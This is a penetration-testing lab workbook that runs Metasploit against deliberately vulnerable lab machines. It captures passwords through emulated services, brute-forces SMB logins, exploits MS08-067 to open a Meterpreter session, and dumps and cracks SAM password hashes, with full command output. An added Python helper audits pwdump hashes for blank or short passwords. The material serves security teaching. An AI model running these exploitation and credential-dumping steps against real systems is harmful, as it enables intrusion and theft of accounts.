Accounts and Passwords

Exercise 1: Capture a Password

In this exercise, you’ll explore the different methods Metasploit has at its disposal to collect passwords from users who can be tricked into accessing a service you control.

Task 1.1

Verify that the PostgreSQL server is running…

root@bah-pod1-kali:~# systemctl status postgresql
postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disab
   Active: active (exited) since Fri 2016-09-30 15:40:39 UTC; 2min 30s ago
  Process: 3452 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 3452 (code=exited, status=0/SUCCESS)

Sep 30 15:40:39 bah-pod1-kali systemd[1]: Starting PostgreSQL RDBMS...
Sep 30 15:40:39 bah-pod1-kali systemd[1]: Started PostgreSQL RDBMS.

Task 1.2

Open Metasploit msfconsole.

msfconsole

Task 1.3

Using tab completion, find out which services Metasploit can emulate by completing: use auxiliary/server/ and use auxiliary/server/capture/

msf > use auxiliary/server/[TAB]
use auxiliary/server/android_browsable_msf_launch
use auxiliary/server/android_mercury_parseuri
use auxiliary/server/browser_autopwn
...

Task 1.4

Task 1.5

Kill the FTP background job. Try jobs -h.

Bonus 1

Try the SMB capture utility while accessing from Windows!

Bonus 2

Suggest a way these utilities could be combined with the IP routing/ARP poisoning attacks you learned in Module 4.

Exercise 2: Brute-Force a Samba Password with Metasploit

Metasploitable2 has accounts with easily guessable passwords. Enumerate the accounts and guess the passwords using Metasploit. Wordlists can be found in /usr/share/wordlists. Make sure db_status shows the following:

msf > db_status
[*] postgresql connected to msf3

Task 2.1

Enumerate the users on metasploitable using the auxiliary/scanner/smb/smb_enumusers module.

Cheat:

msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf auxiliary(smb_enumusers) > run

[*] 192.168.1.3 METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, postfix, service, list, irc, ftp, tomcat55, sync, uucp ] ( LockoutTries=0 PasswordMin=5 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Task 2.2

Use the SMB Login Check Scanner to brute-force Samba logins. Try the username as the password for all users, and use the seccon.txt wordlist.

Hint:

To reduce the amount of work you have to do, only attempt to brute-force the following accounts:

msfadmin
user
postgres
sys
klog
service

Cheat:

seccon@seccon-kali1:~/labs/08-accounts$ cat users
msfadmin
user
postgres
sys
klog
service

seccon@seccon-kali1:~/labs/08-accounts$ sudo msfconsole
...
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf auxiliary(smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/seccon.txt
PASS_FILE => /usr/share/wordlists/seccon.txt
msf auxiliary(smb_login) > set USER_FILE users
USER_FILE => users
msf auxiliary(smb_login) > run

Task 2.3

View the captured credentials in the database. What is the password for the sys account?

Bonus

Using the results from your active recon and the information about services stored in the database, figure out an alternate way to log into metasploitable that does not involve Samba.

Exercise 3: Crack An NTLM-hashed Password

Task 3.1

Using the MS08-067 vulnerability, exploit the windows host and set up a Meterpreter session.

Hint:

Try using the search command:

msf > search ms08_067

Matching Modules
================

    Name                                 Disclosure Date          Rank   Description
    ----                                 ---------------          ----   -----------
    exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

Cheat:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST windows
RHOST => windows
msf exploit(ms08_067_netapi) > run

[*] Started reverse handler on 192.168.1.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:1052) at 2014-11-21 18:15:20 -0800

meterpreter >

Task 3.2

Display the hashes from the SAM, then suspend the Meterpreter session to the background.

Cheat:

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::

meterpreter > background

[*] Backgrounding session 1...

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

    Id  Type                   Information                    Connection
    --  ----                   -----------                    ----------
    1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WINDOWS  192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)

msf exploit(ms08_067_netapi) >

Task 3.3

Dump the hashes from the SAM with the post/windows/gather/smart_hashdump module.

Cheat:

msf exploit(ms08_067_netapi) > use post/windows/gather/smart_hashdump

msf post(smart_hashdump) > sessions -l

Active sessions
===============

Id  Type                   Information                    Connection
--  ----                   -----------                    ----------
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WINDOWS  192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)

msf post(smart_hashdump) > set SESSION 1

SESSION => 1

msf post(smart_hashdump) > run

[*] Running module against WINDOWS
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 26a1ab029cc81f35c920f4e2409cc7e5...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[+]     seccon:"seccon!"
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
[+]     seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[+]     user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] Post module execution completed

msf post(smart_hashdump) > loot

Loot
====

host         service  type            name                content     info            path
----         -------  ----            ----                -------     ----            ----
192.168.1.4           windows.hashes  WINDOWS_hashes.txt  text/plain  Windows Hashes  /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt

Task 3.4

Crack the LM/NTLM hashes from the SAM with the auxiliary/analyze/jtr_crack_fast module.

Cheat:

msf post(smart_hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run

[*] Seeded the password database with 19 words...
fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
[*] Output: Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:04 DONE (Fri Nov 21 18:25:00 2014)  c/s: 5462K  trying: ZEB1900 - ZZZ1900
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 0  time: 0:00:00:06 DONE (Fri Nov 21 18:25:06 2014)  c/s: 25643K  trying: ||V} - |||}
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:00 DONE (Fri Nov 21 18:25:07 2014)  c/s: 1307K  trying: 89093 - 89092
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] cred_17:SECCON!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[*] cred_16::aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
[*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*]
[*] 5 password hashes cracked, 2 left
guesses: 0  time: 0:00:00:12 DONE (Fri Nov 21 18:25:19 2014)  c/s: 10921K  trying: zydeco1900 - seccon!1900
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:05 DONE (Fri Nov 21 18:25:24 2014)  c/s: 32030K  trying: |||}
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0  time: 0:00:00:00 DONE (Fri Nov 21 18:25:24 2014)  c/s: 1709K  trying: 89030 - 89092
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] cred_17:seccon!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*]
[*] 3 password hashes cracked, 2 left
[+] Cracked: user:PASSWORD (192.168.1.4:445)
[+] Cracked: seccon:seccon! (192.168.1.4:445)
[+] Cracked: Administrator: (192.168.1.4:445)
[*] Auxiliary module execution completed

msf auxiliary(jtr_crack_fast) > creds windows

Credentials
===========

host         port  user              pass                                                               type      proof  active?
----         ----  ----              ----                                                               ----      -----  -------
192.168.1.4  445   user              e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687  smb_hash         true
192.168.1.4  445   seccon            e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827  smb_hash         true
192.168.1.4  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100  smb_hash         true
192.168.1.4  445   HelpAssistant     4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4  smb_hash         true
192.168.1.4  445   Administrator     aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  smb_hash         true
192.168.1.4  445   Administrator                                                                        password         true
192.168.1.4  445   seccon            seccon!                                                            password         true
192.168.1.4  445   user              PASSWORD                                                           password         true
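
The hashdump lines above carry audit information before any cracking is done: the constant aad3b435b51404ee is the LM DES block for an empty 7-character half, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT (MD4) hash of an empty password. The following helper, added here as an example and not part of the lab or of Metasploit, parses pwdump-format records and flags blank passwords, accounts whose LM hash is still stored (NoLMHash not enforced) and LM hashes whose second half is empty (password of 7 characters or fewer); it uses the hashes from the transcript above as constructed sample input.

```python
# Added audit helper (example code, not from the lab or Metasploit).
# Assumes the standard pwdump layout: user:rid:lm_hash:nt_hash:::
EMPTY_LM_HALF = "aad3b435b51404ee"              # LM DES of an all-NUL 7-byte block
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of the empty UTF-16LE string

# Constructed sample: the six records from the hashdump transcript above.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
"""


def parse_pwdump_line(line):
    """Split one pwdump record into (user, rid, lm, nt); ValueError if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("not a pwdump record: %r" % line)
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError("hash fields must be 32 hex chars: %r" % line)
    return user, rid, lm, nt


def audit_account(user, rid, lm, nt):
    """Return the findings a defender can read straight from the stored hashes."""
    findings = []
    if nt == EMPTY_NT:
        findings.append("blank password")
    lm_first, lm_second = lm[:16], lm[16:]
    if lm_first != EMPTY_LM_HALF:
        # An LM hash is only stored when NoLMHash is off. LM is case-insensitive and
        # split into two 7-char halves, which is why jtr reports SECCON! before seccon!.
        findings.append("LM hash stored")
        if lm_second == EMPTY_LM_HALF:
            # Second DES block is the empty-block constant: password is <= 7 chars.
            findings.append("password length <= 7")
    return findings


def audit_pwdump(text):
    """Map each account name to its findings (empty list = nothing flagged)."""
    records = (parse_pwdump_line(l) for l in text.splitlines() if l.strip())
    return {user: audit_account(user, rid, lm, nt) for user, rid, lm, nt in records}


if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE).items():
        print("%-18s %s" % (user, ", ".join(findings) or "-"))
```

The findings match what jtr_crack_fast later confirms: Administrator has a blank password, seccon's "seccon!" is 7 characters, and user's "PASSWORD" is 8.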

Exercise 4: Crack Me If You Can!!!

Task 4.1

KoreLogic runs a yearly contest at DEF CON called Crack Me If You Can. Your VM has the contest from 2011. Using John the Ripper and HashCat, try to crack as many passwords as you can.

Bonus

Unzip KoreLogic-2011-CrackMeIfYouCan-tree.zip. Using John the Ripper and HashCat, try to crack as many passwords as you can.

© Copyright Cisco Systems